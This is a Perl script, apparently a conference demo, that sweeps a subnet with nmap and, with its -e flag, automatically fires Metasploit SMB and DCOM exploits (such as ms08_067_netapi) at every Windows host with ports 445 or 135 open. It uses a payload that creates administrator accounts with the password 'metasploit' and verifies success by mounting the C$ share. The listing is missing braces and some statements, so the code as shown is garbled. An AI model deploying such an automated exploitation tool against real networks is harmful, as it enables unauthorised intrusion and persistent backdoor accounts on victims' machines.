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Created June 18, 2014 18:45
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#! /usr/bin/perl
##### written by JimmyC
##### Uses your path to run NMap and
##### Metasploit (msfcli) for automatic
##### exploitation of hosts
##### licensed under the GPL license
##### This program is free software: you can redistribute it and/or modify
##### it under the terms of the GNU General Public License as published by
##### the Free Software Foundation, either version 3 of the License, or
##### (at your option) any later version.
##### This program is distributed in the hope that it will be useful,
##### but WITHOUT ANY WARRANTY; without even the implied warranty of
##### GNU General Public License for more details.
##### You should have received a copy of the GNU General Public License
##### along with this program. If not, see <>.
use warnings;
use strict;
# perl module for parsing command line
use Getopt::Std;
use constant VERSION => '0.2';
use constant TRUE => 1;
use constant FALSE => 0;
# will hold the initial target gotten from the command line
my $initial_target;
# will hold the targets to ignore
my $exclusions;
# will hold machines that are up
my @host_array;
# hold host information from scan
# is really a hash of hashes of arrays where the keys are the IPs of the
# machines that are OS scanned followed by the keys open_ports and os
my %host_hash;
# variable for iterating through host_array and host_hash
my $host;
# variable for iterating through command output
my $line;
# variable to hold the user that metasploit will try to create
my $new_user;
# options hash to hold all command line arguments
my %Options;
# if 0 don't run exploits. if 1, run exploits.
my $exploit_flag = 0;
##### MAIN
# will only run the exploits if the e flag is given when the script is run
if ($exploit_flag == 1)
# will do initial setup and argument checking
sub setup
# clears the list of exclusions that the script will not run against
undef $exclusions;
# path to ifconfig
my $ifconfig="/sbin/ifconfig";
# sets lines equal to what ifconfig gives out or kills the program and tells the user why
my @lines=qx|$ifconfig| or die("Can't get info from ifconfig: ".$!);
# iterates through the lines array so that can get all IP addresses assigned to the box
# the script is run on
# if the line is inet addr and the ip is not, then this is true
if(($_ =~ /inet addr:([\d\.]+)/i) && ($_ !~ /inet addr:
# if exclusions is undefined then this is the first exclusion
if (!defined($exclusions))
$exclusions = $1;
# exclusions are defined so add the new ip to the list
# comma delimited
elsif (defined($exclusions))
$exclusions .= ",$1";
# uses the getopts function to get all options from the command line
# and sets them into the Options hash
# the letters hevxt are valid options that can be given to the script
# with x and t needed arguments
getopts('hevt:x:', \%Options);
# if h is defined in the Options hash then go to the usage eubroutine
if (defined($Options{'h'}))
# if v is defined in the Options hash then go to the version subroutine
if (defined($Options{'v'}))
# if e is defined in the Options hash then exploits will be run because
# exploit_flag will be set to 1
if (defined($Options{'e'}))
$exploit_flag = 1;
# if x is defined in the Options hash, the additional exclusions are
# given and need to be added to the exclusions string
if (defined($Options{'x'}))
# checks to make sure that the value of x in the Options hash matches an ip address,
# or range of addresses
if ($Options{'x'} =~ /([\d|\.|\,|\/]+)/i)
# checks to make sure that exclusions is defined and if
# not it sets it to x value otherwise appends to x value
if (!defined($exclusions))
$exclusions = $Options{'x'};
elsif (defined($exclusions))
$exclusions .= ",$Options{'x'}";
# if the value is not and ip address then error message is displayed
# as well as usage
print "\n\nTarget not IP address or IP subnet\n\n";
# checks to make sure that t is defined in Options hash
if (defined($Options{'t'}))
# makes sure that t is an ip address or subnet
if ($Options{'t'} =~ /([\d|\.|\,|\/]+)/i)
# sets the initial target to the value of t
$initial_target = $Options{'t'};
# not an IP address or subnet so tell the user the error and
# then show the usage
print "\n\nTarget not IP address or IP subnet\n\n";
# t is not defined so tell the user that script needs a target and then
# show usage
print "\n\nNEED A TARGET\n\n";
# if there is anything left in the argument array then there was a problem
# so tell the user that and then show the usage
if ($ARGV[0])
print "\n\nUnknown option given\n\n";
# end of setup function
##### USAGE
# will print the usage for the user
# and then exit the script
sub usage
print "\n\n";
print "Usage:\n";
# $0 is the name of the script that is run. Fills in automatically.
print "$0 [-h] [-v] [-e] [-x exclusions] <-t target>\n\n";
print "[-h] -- optional\n";
print " -- prints this menu\n";
print "[-v] -- optional\n";
print " -- prints the version of the script\n";
print "[-e] -- optional\n";
print " -- tries to exploit targets\n";
print "<-x exclusion> -- optional\n";
print " -- exclusions to exclude from scanning (NMap format)\n";
print "<-t target> -- required\n";
print " -- initial target to start with (NMap format)\n";
print "\n\n";
# end of usage function
### prints script version to STDOUT
sub print_version
# $0 is the script name and prints the VERSION constant along with other
# version info
print "$0 is running version " . VERSION . ".\n";
print "Originally written by JimmyC for the Murray State University 2010 Patterns of Distinction Security Matters conference.\n";
print "Licensed under the GPL license.\n";
# end of print_version function
# performs a ping sweep on initial targets
sub ping_sweep
# lets the user know what is happening
print "Performing Ping Sweep on $initial_target...\n";
# opens a file handle to the command that ends in a pipe
# this allows the output to be gotten and read for processing
# runs an nmap scan with a ping sweep with speed of 3 using the exclusions
# listed in the exclusions string against the initial target given from the command line
open(PING_SWEEP, "nmap -sP -T3 --exclude $exclusions $initial_target |");
# clears the host variable
undef $host;
# reads in the output of the ping sweep command
while (<PING_SWEEP>)
# sets line to the current line from the ping sweep
$line = $_;
# if the line matches Starting Nmap, skip it and go to the next line
if ($line =~ /Starting Nmap /i)
# this line tells you who is being scanned. Grab the ip and set it to $host
elsif ($line =~ /Nmap scan report for ([\d|\.]+)/i)
$host = $1;
# checks to see if the Host is up and that $host is defined. If they are, the push the ip of the
# host ont othe host_array and undefine $host to start the process over again
elsif (($line =~ /Host is up \(\d+\.\d+s latency\)\./i) && (defined($host)))
push(@host_array, $host);
undef $host;
# close the file handle for the ping sweep command
# end of the ping_sweep function
# uses the hosts from the ping sweep to do OS detection on them
sub os_detect
# iterates through each host of the host_array
# values in this array are the results from the ping sweep (hosts that were up)
foreach $host (@host_array)
# chomps the $host variable to remove all end of line junk
# tells the user what is happening
print "\nDetermining OS of $host...\n";
# opens a file handle to get the output of the nmap command
# use -A to get all scans and most common ports and OS detection
# and runs it against the host from the host_array
open(OS_DETECT, "nmap -A $host |");
# reads in the output of the nmap command a line at a time using
# a file handle
# sets $line to the current output line from the command
$line = $_;
# removes all end of line junk
# if the line matches Starting Namp, skip it and move
# to the next line
if ($line =~ /Starting Nmap /i)
# if the line tells who is getting scanned, grab the ip
elsif ($line =~ /Nmap scan report for (.+)/i)
# makes sure that the IP of the one getting scanned matches who
# the command was supposed to scan. If they match, then go to the next line
# else print error and exit.
if ($1 eq $host)
print "There was a problem somewhere.\n\nEXITING!!\n\n";
# if the line just says that the host is up, skip it and move to the next line
elsif ($line =~ /Host is up \(\d+\.\d+s latency\)\./i)
# if the line tells you how many ports are closed, skip it and move to the next line
elsif ($line =~ /Not shown\: \d+ closed ports/i)
# if the line is just th legend, skip it and move to the next line
elsif ($line =~ /PORT STATE SERVICE VERSION/i)
# if the line tells you what was done and who to report incorrect results to, skip it
# and move to the next line
elsif ($line =~ /Service detection performed\. Please report any incorrect results at http\:\/\/nmap\.org\/submit\/ \./i)
# if the line says that Nmap is done, skip it and move to the next line
elsif ($line =~ /Nmap done\: \d+ IP address \(\d+ host up\) scanned in \d+\.\d+ seconds/i)
# if the line says that all ports are closed on the host, grab the host
elsif ($line =~ /All 1000 scanned ports on (.+) are closed/i)
# if the host matches the one just scanned, set line2 to tell
# the user what happened and push that line onto the host_hash for that ip. Next undefine line2
# move to the next line.
if ($1 eq $host)
# commented out this line because was causing an issue with the scan
# when trying to do the push in a couple of lines
#undef @{$host_hash{$host}};
my $line2 = "$host is up but the ports used for OS detection are closed. No other scans done.";
push(@{$host_hash{$host}{'closed_ports'}}, $line2);
undef $line2;
# host didn't match ip, so tell the user something bad happened and exit
print "There was a problem somewhere.\n\nEXITING!!\n\n";
# check to see if the port is active and if so, put it onto the array for the host_hash
# for that port type
elsif ($line =~ /(\d+)\/(\w+)\s+open\s+.+/i)
if ($2 eq 'tcp')
push(@{$host_hash{$host}{'open_ports'}{'tcp'}}, $1);
elsif ($2 eq 'udp')
push(@{$host_hash{$host}{'open_ports'}{'udp'}}, $1);
# check to see what os and push that onto the array for the host hash
elsif ($line =~ /OS details\: (.+)/i)
push(@{$host_hash{$host}{'os'}}, $1);
# closes the file handle for the Nmap command
close OS_DETECT;
# end of the os_detect function
# will exploit the host based on the
# information from the os_detect and ping sweep functions
sub exploit_host
# iterates through the keys of the host_hash which is the ip
# addresses of machines that are up
for my $key (keys %host_hash)
# tells the user what is going to happen
print "\nGoing to see what can be exploited on host $key...\n";
# iterates through all of the open tcp ports on the host
foreach my $port (@{$host_hash{$key}{'open_ports'}{'tcp'}})
# gets it just down to the port number and removes new line crap
# if the port is equal to 445, then move in and see if exploits work
if ($port == 445)
# calls default_exploit and passes it the ip of the machine and
# the exploit to run
# does this for each exploit want to run
&default_exploit($key, "windows/smb/ms04_011_lsass");
&default_exploit($key, "windows/smb/ms08_067_netapi");
&default_exploit($key, "windows/smb/ms06_066_nwapi");
&default_exploit($key, "windows/smb/ms05_039_pnp");
&default_exploit($key, "windows/smb/ms06_066_nwwks");
# if the port is equal to 135, then move in and see if exploits work
elsif ($port == 135)
# calls default_exploit and passes it the ip of the machine and
# the exploit to run
# does this for each exploit want to run
&default_exploit($key, "windows/dcerpc/ms03_026_dcom");
# end of exploit_host function
### will run exploits with default settings
# it is passed the ip of the host to exploit
# and the exploit to try
sub default_exploit
# sets ip to the first argument passed
my $ip = $_[0];
# sets $exploit to the second argument passed
my $exploit = $_[1];
# creates a temp array for storing exploit output
my @temp_array;
# creates a temporary string variable
my $string;
# undefines the string variable to clear it
undef $string;
# undefines the temp_array to clear it
undef @temp_array;
# creates a hash that will hold the options for the exploits wanting to run
my %options_hash;
# sets option_string to get the options for the exploit wanting to run
# uses the ip as the RHOST value so that that is one value that will already be
# filled in
# also redirected stderr to stdin so could get it in the pipe
my $options_string = "msfcli $exploit RHOST=$ip O 2>&1 |";
# open the options_string as a file so can read stdin
open(OPTIONS, $options_string);
# read in OPTIONS filehandle one line at a time
while (<OPTIONS>)
# sets line to current read in line
$line = $_;
# remove all end of line garbage
# pushes the read in line onto the temp_array array
push(@temp_array, $line);
# closes the file handle OPTIONS
close (OPTIONS);
# remove the last line of the temp_array array because just garbage
# remove first four lines of the temp_array because they are just garbage
# iterate through the temp_array array setting line to the current line
foreach $line (@temp_array)
# if line is not defined go to the next line
if (!defined($line))
# if line is the RHOST option with an ip address then go to the next line
elsif ($line =~ /\s+RHOST\s+([A-Za-z0-9\.]+)\s+yes\s+[A-Za-z0-9\s]+$/i)
# if line is the RPORT option with a port defined then go to the next line
elsif ($line =~ /\s+RPORT\s+([A-Za-z0-9\.]+)\s+yes\s+[A-Za-z0-9\s]+$/i)
# if the line is any other option with the default option filled in, push then option
# onto the array called @{options_hash{required}{option}}
# also the option is set to all caps
elsif ($line =~ /\s+([A-Za-z0-9\.]+)\s+([A-Za-z0-9\.]+)\s+yes\s+[A-Za-z0-9\s]+$/i)
push(@{$options_hash{'required'}{$1}}, uc($2));
# if the line is any option with a default option filled in but still has
# other values listed in the description, then this is true
elsif ($line =~ /\s+([A-Za-z0-9\.]+)\s+([A-Za-z0-9\.]+)\s+yes\s+[A-Za-z0-9\s]+\((.+)\)/i)
# push the inital default value onto the array of @{options_hash{required}{option}}
push(@{$options_hash{'required'}{$1}}, uc($2));
# split the other options listed on a comma and a space and set them into
# the options array
my @options = split(/, /, $3);
# iterate through each of the split options
foreach (@options)
# sets option to the all caps version of the current possible value
my $option = uc($_);
# if the current value does not equal the all caps version of the
# value gotten in the options line push it onto the
# @{options_hash{required}{option}} array
if ($option ne uc($2))
push(@{$options_hash{'required'}{$1}}, $option);
# if the option is optional and has a default value push it onto the
# @{options_hash{optional}{option}} array
elsif ($line =~ /\s+([A-Za-z0-9\.]+)\s+([A-Za-z0-9\.]+)\s+no\s+.[A-Za-z0-9\s]+/i)
push(@{$options_hash{'optional'}{$1}}, uc($2));
# if the option is optional and has a default value and lists other possible
# values in the description, then move in
elsif ($line =~ /\s+([A-Za-z0-9\.]+)\s+([A-Za-z0-9\.]+)\s+no\s+[A-Za-z0-9\s]+\((.+)\)/i)
# push the default value onto the @{options_hash{optional}{option}} array
push(@{$options_hash{'optional'}{$1}}, uc($2));
# sets options array to the values split from the description
# split based on a comma and a space
my @options = split(/, /, $3);
# iterates through the options array
foreach (@options)
# sets option to the all caps version of the current possible value
my $option = uc($_);
# if the current value does not equal the all caps version of the
# value gotten in the options line push it onto the
# @{options_hash{optional}{option}} array
if ($option ne uc($2))
push(@{$options_hash{'optional'}{$1}}, $option);
# creates variable for holding exploit strings
my @exploit_strings;
# clears out anything in exploit string that was there
undef @exploit_strings;
# checks to see if required or optional are defined exist in the options_hash has
if ((exists $options_hash{'required'}) || (exists $options_hash{'optional'}))
# iterates through the options_hash hash with keys of explicit
for my $explicit (keys %options_hash)
# iterates through the hash %{$options_hash{$explicit}} with keys set to type
for my $type (keys %{$options_hash{$explicit}})
# sets local variable counter1 to 0
my $counter1 = 0;
# iterates through the array @{$options_hash{$explicit}{$type}}
# setting values to option
foreach my $option (@{$options_hash{$explicit}{$type}})
# creates a new user account by calling sub rountine generate_new_username
$new_user = generate_new_username();
# creates an exploit string ysing the option of type=option and sets the payload to add
# a user account with the name as new_user variable plus the counter1 variable
my $exploit_string_push = "msfcli $exploit RHOST=$ip $type=$option PAYLOAD=windows/adduser USER=$new_user$counter1 E 2>&1 |";
# pushes the exploit string onto the exploit_strings array
push(@exploit_strings, $exploit_string_push);
# increases the counter1 variable by one
# no options other than port and address so just create the exploit string
# generate a new username and set it to the new_user variable
$new_user = generate_new_username();
# set exploit_strings position 0 to the exploit string that has a
# payload of adding a new user to the system
$exploit_strings[0] = "msfcli $exploit RHOST=$ip PAYLOAD=windows/adduser USER=$new_user E 2>&1 |";
# iterates through the exploit_strings array
foreach (@exploit_strings)
# remove any end of line garbage
# creates temp variable exploit_string and sets it to the current line
my $exploit_string = $_;
# undefine the new_user variable so can set it later
undef $new_user;
# does matching to get username trying to make and exploit using
# no extra options given on this one
if ($exploit_string =~ /msfcli ([\w|\/]+) RHOST\=[\w|\d|\.]+ PAYLOAD\=windows\/adduser USER\=(user\d+) E 2\>\&1 \|/i)
# new_user it set to the user account in the exploit string
# tells the user what exploit is going to be tried and what user account will be created
print "Going to try to use exploit $1 and create user $new_user\n";
# gets the exploit, options, and the user account that will be tried
elsif ($exploit_string =~ /msfcli ([\w|\/]+) RHOST\=[\w|\d|\.]+ (.+) PAYLOAD\=windows\/adduser USER\=(user\d+) E 2\>\&1 \|/i)
# sets new_user to the user account in the exploit string
# tells the user what exploit will be tried with what options, and what user account will be created
print "Going to try to use exploit $1 with option(s) $2 and create user $new_user\n";
# createa a counter and sets it to 1
my $counter = 1;
# clears the temp_array array
# while counter is less than 4, this will continue
# this will allow the exploits to be tried 3 times apiece
# do this because sometimes the exploit might fail the first couple of times
while ($counter < 4)
# opens a file handle using the exploit_string
open(EXPLOIT, $exploit_string);
# reads in the lines from the command output
while (<EXPLOIT>)
# sets line to the current read in line
$line = $_;
# removes end of line crap for line
# pushes the line onto the temp_array array
push(@temp_array, $line);
# closes the file handle for the exploit command
# removes the last line of the temp_array array
# checks to see if the exploit worked using exploit_worked subroutine
# if it worked then this is true
# passes the last line of the temp_array array, the ip, and the
# user account tried to create
if (&exploit_worked(pop(@temp_array), $ip, $new_user))
# if the exploit does no include any extra options, then
# set counter to 10, set string to what user was added with what exploit,
# push that string onto the array @{$host_hash{$ip}{'exploits_that_worked'}}
if ($exploit_string =~ /msfcli ([\w|\/]+) RHOST\=[\w|\d|\.]+ PAYLOAD\=windows\/adduser USER\=(user\d+) E 2\>\&1 \|/i)
$counter = 10;
$string = "$2 added with password metasploit using $1 exploit";
push(@{$host_hash{$ip}{'exploits_that_worked'}}, $string);
# if the exploit includes extra options, then
# set counter to 10, set string to what user was added with what exploit and options
# push the string onto the array @{$host_hash{$ip}{'exploits_that_worked'}}
elsif ($exploit_string =~ /msfcli ([\w|\/]+) RHOST\=[\w|\d|\.]+ (.+) PAYLOAD\=windows\/adduser USER\=(user\d+) E 2\>\&1 \|/i)
$counter = 10;
$string = "$3 added with password metasploit using $1 exploit and option(s) $2";
push(@{$host_hash{$ip}{'exploits_that_worked'}}, $string);
# exploit didn't work, so counter is incremented by one
$counter += 1;
# checks to see if string is defined or not. if not, then this is true
# and that means that the exploit was unsuccessful
if (!defined($string))
# checks to see if the exploit string does not contain any extra options
if ($exploit_string =~ /msfcli ([\w|\/]+) RHOST\=[\w|\d|\.]+ PAYLOAD\=windows\/adduser USER\=(user\d+) E 2\>\&1 \|/i)
# sets string to exploit failed string
$string = "$1 failed to exploit";
# pushes the string onto the array @{$host_hash{$ip}{'exploits_that_failed'}}
push(@{$host_hash{$ip}{'exploits_that_failed'}}, $string);
# clears the string in case don't later on
undef $string;
# checks to see if the exploit string contains any extra options
elsif ($exploit_string =~ /msfcli ([\w|\/]+) RHOST\=[\w|\d|\.]+ (.+) PAYLOAD\=windows\/adduser USER\=(user\d+) E 2\>\&1 \|/i)
# sets string to exploit failed with options string
$string = "$1 failed to exploit using option(s) $2";
# pushes the string onto the array @{$host_hash{$ip}{'exploits_that_failed'}}
push(@{$host_hash{$ip}{'exploits_that_failed'}}, $string);
# clears the string in case don't later on
undef $string;
# undefines the string variable to make sure that it is clear.
undef $string;
# moves to the next exploit string
# end of default_exploit function
# will make new username to pass to metasploit
sub generate_new_username
# takes the time on the local machine and passes it to the localtime function that then
# sets each of the temp variables to the the correct position
(my $Second, my $Minute, my $Hour, my $Day, my $Month, my $Year, my $WeekDay, my $DayOfYear, my $IsDST) = localtime(time);
# sets the Year to 1900 plus itself
$Year += 1900;
# adds one to Month because month is typically 0-11
# sets date to the concatenation of Hour, Minute, Second, Month, Day, and Year
my $date = $Hour . $Minute . $Second . $Month . $Day . $Year;
# returns user concatenated with the date variable
return "user" . $date;
# end of generate_new_username function
### Takes the last line of the temp_array variable, the ip of the
### host, and the user account created and checks to see if the exploit worked
sub exploit_worked
# last line of the temp array that is passed to the function
$line = $_[0];
# temp variable holding the ip address passed to the function
my $ip = $_[1];
# temp variable of the user account created, passed to the function
my $user = $_[2];
# checks to see if the last line gotten from the exploit is not Exploit Failed
# if it is not, then the check proceeds
if ($line !~ /Exploit failed\: /i)
# sets the temporary variable to what the mount command will be to test if the exploit worked
# should only be able to mount the C drive if the user is an admin
# also pass all output (error and other) to STDOUT
my $mount_command = "mount -t cifs //$ip/C\$ /mnt/smb/ -o username=$user,password=metasploit 2>&1";
# sets result to the commnd output of running the command
my $result = `$mount_command`;
# if result matches the mount error, then the user was not created and False is returned
# to the calling operation
if ($result =~ /mount error 13 \= Permission denied/i)
return FALSE;
# must be mounted so unmount the share
`umount /mnt/smb`;
# since it made it this far, that means that the command worked and True is returned to the
# calling operation
return TRUE;
# the last line gotten from the exploit was Exploit Failed so, return
# False to the calling function
return FALSE;
# end of exploit_worked function
# will print output of the results of this scan
sub print_output
# tell the user what is about to happen
print "\n\nOUTPUT:\n\n";
# iterates through all the hosts in the host_hash hash
for my $key (keys %host_hash)
# tell the user what target the information is for
print "TARGET = $key\n";
# sees if the value for @{$host_hash{$key}{'closed_ports'}}[0] is defined
if (defined(@{$host_hash{$key}{'closed_ports'}}[0]))
# sets string equal to @{$host_hash{$key}{'closed_ports'}}[0]
my $string = @{$host_hash{$key}{'closed_ports'}}[0];
# prints the string for the user
print "\t$string\n";
# the host was up so time to print out information about it
# checks to see if we got the os of the host
if (defined(@{$host_hash{$key}{'os'}}))
# tell the user what they are about to see
print "\tOS:\n";
# iterates through the os listing and chomps each line
# and then prints each line to the screen
foreach (@{$host_hash{$key}{'os'}})
print "\t\t$_\n";
# checks to see if there are any tcp ports open on the host
if (defined(@{$host_hash{$key}{'open_ports'}{'tcp'}}))
# tells the user what they are about to see
print "\tTCP Ports Open:\n";
# iterates through the tcp ports and if the line is
# defined, chomps it, and prints it to the screen
foreach (@{$host_hash{$key}{'open_ports'}{'tcp'}})
if (defined($_))
print "\t\t$_\n";
# checks to see if there are any udp ports open on the host
if (defined(@{$host_hash{$key}{'open_ports'}{'udp'}}))
# tells the user what they are about to see
print "\tUDP Ports Open:\n";
# iterates through the udp ports and if the line is
# defined, chomps it, and prints it to the screen
foreach (@{$host_hash{$key}{'open_ports'}{'udp'}})
print "\t\t$_\n";
# checks to see exploits were run and if so then move in
if ($exploit_flag == 1)
# checks to see if exploits worked on the host
if (defined(@{$host_hash{$key}{'exploits_that_worked'}}))
# tells the user what they are about to see
print "\tExploits that Worked:\n";
# iterates through the worked exploits and chomps each line and \
# then prints the line to the screen
foreach (@{$host_hash{$key}{'exploits_that_worked'}})
print "\t\t$_\n";
# checks to see if exploits failed on the host
if (defined(@{$host_hash{$key}{'exploits_that_failed'}}))
# tells the user what they are about to see
print "\tExploits that Failed:\n";
# iterates through the failed exploits and chomps each line
# and prints the line to the screen
foreach (@{$host_hash{$key}{'exploits_that_failed'}})
print "\t\t$_\n";
# prints a few new lines for spacing
print "\n\n";
# moves to the next host in the hash
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